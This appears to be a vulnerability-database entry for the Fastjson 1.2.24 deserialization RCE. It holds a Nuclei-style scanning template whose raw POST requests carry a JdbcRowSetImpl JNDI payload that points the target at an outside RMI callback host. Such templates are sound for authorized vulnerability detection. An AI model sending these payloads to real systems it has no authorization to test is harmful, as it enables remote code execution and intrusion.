fastjson-1-2-24-rce: Fastjson 1.2.24 - Remote Code Execution

日期: 2025-08-01 | 影响软件: fastjson | POC: 已公开

漏洞描述

Fastjson 1.2.24 is susceptible to a deserialization remote code execution vulnerability.

PoC代码[已公开]

id: fastjson-1-2-24-rce

info:
  name: Fastjson 1.2.24 - Remote Code Execution
  author: zh
  severity: critical
  description: Fastjson 1.2.24 is susceptible to a deserialization remote code execution vulnerability.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce
    - https://www.freebuf.com/vuls/208339.html
    - https://github.com/wyzxxz/fastjson_rce_tool
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 2
  tags: fastjson,rce,deserialization,oast,vulhub,vuln

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
            "b":{
                "@type":"com.sun.rowset.JdbcRowSetImpl",
                "dataSourceName":"rmi://{{interactsh-url}}/Exploit",
                "autoCommit":true
            }
        }
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
           "@type":"com.sun.rowset.JdbcRowSetImpl",
           "dataSourceName":"rmi://{{interactsh-url}}/Exploit",
           "autoCommit":true
        }

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms DNS Interaction
        words:
          - "dns"

      - type: word
        condition: and
        words:
          - "Internal Server Error"
          - "500"
# digest: 4b0a00483046022100bdba623f2721a637e6bd72a90139456c68f36d579a7f197564be172c7f5ed16b022100f5fc9dcd6b310749b9a38d3e2e8d9cd8884a4840af4b57b57057a43eda4c913d:922c64590222798bb761d5b6d8e72950

相关漏洞推荐